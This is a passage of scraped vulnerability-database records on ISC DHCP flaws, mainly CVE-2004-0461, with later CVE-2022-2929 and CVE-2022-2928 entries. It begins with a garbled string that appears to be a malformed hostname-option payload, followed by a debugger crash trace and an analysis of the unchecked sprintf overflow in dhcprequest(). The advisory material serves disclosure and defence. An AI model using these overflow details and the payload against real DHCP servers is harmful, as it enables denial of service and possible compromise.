\n860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-284AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1. \n92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X 
\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50, \nname=0x8149dac \"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", len=7, file=0x80bbe25 \"mdb.c\", line=1662)\n    at hash.c:363\n363             hashno = (*table -\u003e do_hash) (name, len, table -\u003e \nhash_count);\n(gdb)\n \n\nbacktracing stack show:\n\n(gdb) bt\n#0  0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50, \nname=0x8149dac \"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", len=7, file=0x80bbe25 \"mdb.c\", line=1662)\n    at hash.c:363\n#1  0x0806fb0a in lease_hash_lookup (ptr=0xbfffde24, table=0x38322d50, \nbuf=0x8149dac \"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", len=7, file=0x80bbe25 \"mdb.c\", line=1662)\n    at mdb.c:2055\n#2  0x0806eb5b in find_lease_by_hw_addr (lp=0xbfffde24, hwaddr=0x8149dac \n\"\\001\\xff\\xff\\xff\\xff\\xff\\xff\", hwlen=7, file=0x80bbe25 \"mdb.c\", line=1662)\n    at mdb.c:1574\n#3  0x0806ee5f in hw_hash_add (lease=0x8149d30) at mdb.c:1661\n#4  0x0806d959 in supersede_lease (comp=0x8149d30, lease=0x811def8, \ncommit=1, propogate=1, pimmediate=1) at mdb.c:969\n#5  0x08050cb9 in ack_lease (packet=0x811d6e0, lease=0x8149d30, offer=5, \nwhen=0,\n    msg=0xbfffdfd0 \"DHCPREQUEST for 192.168.0.99 from ff:ff:ff:ff:ff:ff \nvia eth0\", ms_nulltp=0) at dhcp.c:2227\n#6  0x0804d041 in dhcprequest (packet=0x811d6e0, ms_nulltp=0, \nip_lease=0x0) at dhcp.c:662\n#7  0x0804c37d in dhcp (packet=0x811d6e0) at dhcp.c:224\n#8  0x08088d9a in do_packet (interface=0x811d568, packet=0xbfffe580, \nlen=1430, from_port=17408, from=\n      {len = 4, iabuf = \u0027\\0\u0027 \u003crepeats 15 times\u003e}, hfrom=0xbffff5b0) at \noptions.c:2237\n#9  0x08096718 in got_one (h=0x811d568) at discover.c:785\n#10 0x080a937e in omapi_one_dispatch (wo=0x0, t=0x0) at dispatch.c:418\n#11 0x0807cce3 in dispatch () at dispatch.c:103\n#12 0x0804add1 in main (argc=3, 
argv=0xbffff904, envp=0xbffff914) at \ndhcpd.c:614\n#13 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6\n(gdb)\n\nNote that the daemon may actually crash at a different location \ndepending of the first corrupted structure it meets and therefore,\nof the size of the malicious option sent, along with the context (type \nof packet, leases in use etc...)\n\n\nProblems in the source:\nI have spent quite some time to find out where the overflow actually \ntakes its roots, here are my findings:\n\nfile server/dhcp.c:\nfunction dhcprequest :\n\n        char msgbuf [1024]; /* XXX */\n        char *s;\n\n.... \n\n  if (lease \u0026\u0026 lease -\u003e client_hostname \u0026\u0026\n            db_printable (lease -\u003e client_hostname))\n                s = lease -\u003e client_hostname;\n        else\n                s = (char *)0;\n\n\n...... \n\n  sprintf (msgbuf, \"DHCPREQUEST for %s%s from %s %s%s%svia %s\",\n                 piaddr (cip), smbuf,\n                 (packet -\u003e raw -\u003e htype\n                  ? print_hw_addr (packet -\u003e raw -\u003e htype,\n                                   packet -\u003e raw -\u003e hlen,\n                                   packet -\u003e raw -\u003e chaddr)\n                  : (lease\n                     ? print_hex_1 (lease -\u003e uid_len, lease -\u003e uid,\n                                    lease -\u003e uid_len)\n                     : \"\u003cno identifier\u003e\")),\n                 s ? \"(\" : \"\", s ? s : \"\", s ? \") \" : \"\",\n                  packet -\u003e raw -\u003e giaddr.s_addr\n                  ? inet_ntoa (packet -\u003e raw -\u003e giaddr)\n                  : packet -\u003e interface -\u003e name);\n\n\nTo summarize, s is referencing the reassembled hostname option passed to \nthe daemon, afterwhat it is used as is in sprintf and stored in msgbuf \n(fixed size) without any length checking. 
\nlocal msgbuf can obviously be overrun, corrupting various structures in \nstack and eventually causing the server to crash\nNote that the call to db_printable( ), filtering hostname,  may render \nthe task harder to root a server but likely not impossible. \nAlso being able to corrupt structures like *lease or *oc may have \ninteresting side effects from an attacker perspective. \n\nvoid dhcprequest (packet, ms_nulltp, ip_lease)\n        struct packet *packet;\n        int ms_nulltp;\n        struct lease *ip_lease;\n{\n        struct lease *lease;\n        struct iaddr cip;\n        struct iaddr sip;\n        struct subnet *subnet;\n        int ours = 0;\n        struct option_cache *oc;\n        struct data_string data;\n        int status;\n        char msgbuf [1024]; /* XXX */\n        char *s;\n        char smbuf [19];\n\n.... \n\nthe very same problem is present in dhcpdiscover( ),  dhcpdecline( ),  \ndhcprequest(  ) , dhcprelease( ), ... \nplease look at the diff in unified format, attached to this email, for a \ndetailed list",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0461"
      },
      {
        "db": "CERT/CC",
        "id": "VU#317350"
      },
      {
        "db": "CERT/CC",
        "id": "VU#654390"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      },
      {
        "db": "BID",
        "id": "10591"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8891"
      },
      {
        "db": "PACKETSTORM",
        "id": "52810"
      },
      {
        "db": "PACKETSTORM",
        "id": "33622"
      },
      {
        "db": "PACKETSTORM",
        "id": "33664"
      }
    ],
    "trust": 3.69
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#654390",
        "trust": 3.5
      },
      {
        "db": "USCERT",
        "id": "TA04-174A",
        "trust": 2.9
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0461",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "10591",
        "trust": 2.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#317350",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "23265",
        "trust": 1.8
      },
      {
        "db": "XF",
        "id": "16476",
        "trust": 1.4
      },
      {
        "db": "XF",
        "id": "16475",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000617",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-117",
        "trust": 0.7
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2004:019",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20040708 [OPENPKG-SA-2004.031] OPENPKG SECURITY ADVISORY (DHCPD)",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20040622 DHCP VULN // NO CODE 0DAY //",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20040628 ISC DHCP OVERFLOWS",
        "trust": 0.6
      },
      {
        "db": "CERT/CC",
        "id": "TA04-174A",
        "trust": 0.6
      },
      {
        "db": "MANDRAKE",
        "id": "MDKSA-2004:061",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-8891",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "52810",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "33622",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "33664",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#317350"
      },
      {
        "db": "CERT/CC",
        "id": "VU#654390"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8891"
      },
      {
        "db": "BID",
        "id": "10591"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      },
      {
        "db": "PACKETSTORM",
        "id": "52810"
      },
      {
        "db": "PACKETSTORM",
        "id": "33622"
      },
      {
        "db": "PACKETSTORM",
        "id": "33664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0461"
      }
    ]
  },
  "id": "VAR-200408-0175",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8891"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2025-04-03T22:09:54.035000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ISC Dynamic Host Configuration Protocol (DHCP)",
        "trust": 0.8,
        "url": "https://www.isc.org/sw/dhcp/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0461"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "http://www.us-cert.gov/cas/techalerts/ta04-174a.html"
      },
      {
        "trust": 2.7,
        "url": "http://www.kb.cert.org/vuls/id/654390"
      },
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/10591"
      },
      {
        "trust": 1.8,
        "url": "http://www.xerox.com/downloads/usa/en/c/cert_xrx06_004_v11.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2004:061"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/23265"
      },
      {
        "trust": 1.7,
        "url": "http://www.novell.com/linux/security/advisories/2004_19_dhcp_server.html"
      },
      {
        "trust": 1.4,
        "url": "http://xforce.iss.net/xforce/xfdb/16476"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16476"
      },
      {
        "trust": 1.0,
        "url": "http://www.kb.cert.org/vuls/id/317350"
      },
      {
        "trust": 1.0,
        "url": "http://marc.info/?l=bugtraq\u0026m=108795911203342\u0026w=2"
      },
      {
        "trust": 1.0,
        "url": "http://marc.info/?l=bugtraq\u0026m=108843959502356\u0026w=2"
      },
      {
        "trust": 1.0,
        "url": "http://marc.info/?l=bugtraq\u0026m=108938625206063\u0026w=2"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-0461"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/16475"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnta04-174a/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/tr/trta04-174a"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2004-0461"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108843959502356\u0026w=2"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108938625206063\u0026w=2"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108795911203342\u0026w=2"
      },
      {
        "trust": 0.3,
        "url": "http://www.mandrakesoft.com/security/advisories?name=mdksa-2004:061"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/367286"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=108795911203342\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=108843959502356\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=108938625206063\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.xerox.com/downloads/usa/en/c/cert_xrx06_006_v1b.pdf"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/software_inspector/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/23265/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/4746/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/4553/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/cas/techalerts/ta04-174a.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/legal.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.isc.org/sw/dhcp/"
      },
      {
        "trust": 0.1,
        "url": "http://www.isc.org/products/dhcp"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#317350"
      },
      {
        "db": "CERT/CC",
        "id": "VU#654390"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8891"
      },
      {
        "db": "BID",
        "id": "10591"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      },
      {
        "db": "PACKETSTORM",
        "id": "52810"
      },
      {
        "db": "PACKETSTORM",
        "id": "33622"
      },
      {
        "db": "PACKETSTORM",
        "id": "33664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0461"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#317350"
      },
      {
        "db": "CERT/CC",
        "id": "VU#654390"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8891"
      },
      {
        "db": "BID",
        "id": "10591"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      },
      {
        "db": "PACKETSTORM",
        "id": "52810"
      },
      {
        "db": "PACKETSTORM",
        "id": "33622"
      },
      {
        "db": "PACKETSTORM",
        "id": "33664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0461"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-06-22T00:00:00",
        "db": "CERT/CC",
        "id": "VU#317350"
      },
      {
        "date": "2004-06-22T00:00:00",
        "db": "CERT/CC",
        "id": "VU#654390"
      },
      {
        "date": "2004-08-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8891"
      },
      {
        "date": "2004-06-22T00:00:00",
        "db": "BID",
        "id": "10591"
      },
      {
        "date": "2009-04-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      },
      {
        "date": "2006-12-07T06:24:29",
        "db": "PACKETSTORM",
        "id": "52810"
      },
      {
        "date": "2004-06-22T23:37:13",
        "db": "PACKETSTORM",
        "id": "33622"
      },
      {
        "date": "2004-06-28T00:42:00",
        "db": "PACKETSTORM",
        "id": "33664"
      },
      {
        "date": "2004-06-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      },
      {
        "date": "2004-08-06T04:00:00",
        "db": "NVD",
        "id": "CVE-2004-0461"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-07-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#317350"
      },
      {
        "date": "2004-07-21T00:00:00",
        "db": "CERT/CC",
        "id": "VU#654390"
      },
      {
        "date": "2017-07-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8891"
      },
      {
        "date": "2009-07-12T05:16:00",
        "db": "BID",
        "id": "10591"
      },
      {
        "date": "2009-04-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      },
      {
        "date": "2005-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      },
      {
        "date": "2025-04-03T01:03:51.193000",
        "db": "NVD",
        "id": "CVE-2004-0461"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "33622"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ISC DHCP contains a stack buffer overflow vulnerability in handling log lines containing ASCII characters only",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#317350"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Boundary Condition Error",
    "sources": [
      {
        "db": "BID",
        "id": "10591"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      }
    ],
    "trust": 0.9
  }
}

CVE-2022-2929 (GCVE-0-2022-2929)

Vulnerability from nvd – Published: 2022-10-07 04:45 – Updated: 2024-09-16 18:28
Title
DHCP memory leak
Summary
In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory.
CWE
  • The function fqdn_universe_decode() allocates buffer space for the contents of option 81 (fqdn) data received in a DHCP packet. The maximum length of a DNS label is 63 bytes. The function tests the length byte of each label contained in the fqdn; if it finds a label whose length byte value is larger than 63, it returns without dereferencing the buffer space. This will cause a memory leak. Affects In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1
Assigner
isc
Impacted products
Vendor Product Version
ISC ISC DHCP Affected: 1.0 through versions before 4.1-ESV-R16-P2
Affected: 4.2 through versions before 4.4.3.-P1
Date Public
2022-10-05 00:00
Credits
ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T00:52:59.819Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/cve-2022-2929"
          },
          {
            "name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
          },
          {
            "name": "FEDORA-2022-f5a45757df",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
          },
          {
            "name": "FEDORA-2022-9ca9a94e28",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
          },
          {
            "name": "FEDORA-2022-c4f274a54f",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
          },
          {
            "name": "GLSA-202305-22",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/202305-22"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "1.0 through versions before 4.1-ESV-R16-P2"
            },
            {
              "status": "affected",
              "version": "4.2 through versions before 4.4.3.-P1"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue."
        }
      ],
      "datePublic": "2022-10-05T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "In ISC DHCP 1.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "We are not aware of any active exploits."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "The function fqdn_universe_decode() allocates buffer space for the contents of option 81 (fqdn) data received in a DHCP packet. The maximum length of a DNS label is 63 bytes. The function tests the length byte of each label contained in the fqdn; if it finds a label whose length byte value is larger than 63, it returns without dereferencing the buffer space. This will cause a memory leak. Affects In ISC DHCP 1.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:00:00.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "url": "https://kb.isc.org/docs/cve-2022-2929"
        },
        {
          "name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
        },
        {
          "name": "FEDORA-2022-f5a45757df",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
        },
        {
          "name": "FEDORA-2022-9ca9a94e28",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
        },
        {
          "name": "FEDORA-2022-c4f274a54f",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
        },
        {
          "name": "GLSA-202305-22",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://security.gentoo.org/glsa/202305-22"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of ISC DHCP. These can all be downloaded from https://www.isc.org/downloads.  4.4.3-P1 4.1-ESV-R16-P2"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "DHCP memory leak",
      "workarounds": [
        {
          "lang": "en",
          "value": "As exploiting this vulnerability requires an attacker to send packets for an extended period of time, restarting servers periodically could be a viable workaround."
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2022-2929",
    "datePublished": "2022-10-07T04:45:12.836Z",
    "dateReserved": "2022-08-22T00:00:00.000Z",
    "dateUpdated": "2024-09-16T18:28:37.665Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-2928 (GCVE-0-2022-2928)

Vulnerability from nvd – Published: 2022-10-07 04:45 – Updated: 2024-09-17 00:21
Title
An option refcount overflow exists in dhcpd
Summary
In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option's refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort.
CWE
  • A DHCP server configured with allow leasequery;, a remote machine with access to the server can send lease queries for the same lease multiple times, leading to the add_option() function being repeatedly called. This could cause an option's refcount field to overflow and the server to abort. Internally, reference counters are integers and thus overflow at 2^31 references, so even at 1000 lease query responses per second, it would take more than three weeks to crash the server. Affects In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1
Assigner
isc
Impacted products
Vendor Product Version
ISC ISC DHCP Affected: 4.4.0 through versions before 4.4.3-P1
Affected: 4.1 ESV 4.1-ESV-R1 through versions before 4.1-ESV-R16-P1
Date Public
2022-10-05 00:00
Credits
ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T00:53:00.326Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/cve-2022-2928"
          },
          {
